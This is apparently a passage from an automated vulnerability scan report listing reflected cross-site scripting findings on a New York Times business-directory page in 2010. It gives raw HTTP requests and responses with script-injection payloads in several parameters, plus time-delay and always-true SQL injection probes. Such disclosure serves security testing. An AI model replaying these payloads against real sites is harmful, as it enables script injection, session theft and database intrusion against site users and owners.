GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A9f9fa"><script>alert(1)</script>fbfd7560356c2d4d7&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91518
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=IGIPGLGAKJINHMALJOMJMKEB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="ROrder" value="A9f9fa"><script>alert(1)</script>fbfd7560356c2d4d7">
...[SNIP]...

4.216. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RSCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the RSCount request parameter is copied into the HTML document as plain text between tags. The payload ff435<script>alert(1)</script>161323dd2873ba3fd was submitted in the RSCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500ff435<script>alert(1)</script>161323dd2873ba3fd&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=JDIPGLGAGKINHNJPBNGFIHLA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:22:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7151
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500ff435<script>alert(1)</script>161323dd2873ba3fd&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1
...[SNIP]...

4.217. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RSCount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the RSCount request parameter is copied into the HTML document as plain text between tags. The payload a9052<script>alert(1)</script>06078ddb381 was submitted in the RSCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500a9052<script>alert(1)</script>06078ddb381&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:25:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500a9052<script>alert(1)</script>06078ddb381&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1
...[SNIP]...

4.218. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the RegionId request parameter is copied into the HTML document as plain text between tags. The payload 3a3be<script>alert(1)</script>9eee8b9bea07a161d was submitted in the RegionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=33a3be<script>alert(1)</script>9eee8b9bea07a161d&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:29:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=KBJPGLGAJMIHJIABPGAMMPEI; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=33a3be<script>alert(1)</script>9eee8b9bea07a161d&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c
...[SNIP]...

4.219. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [RegionId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the RegionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ffd"><script>alert(1)</script>565d1c5bd36cff4ca was submitted in the RegionId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=b0ffd"><script>alert(1)</script>565d1c5bd36cff4ca&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c1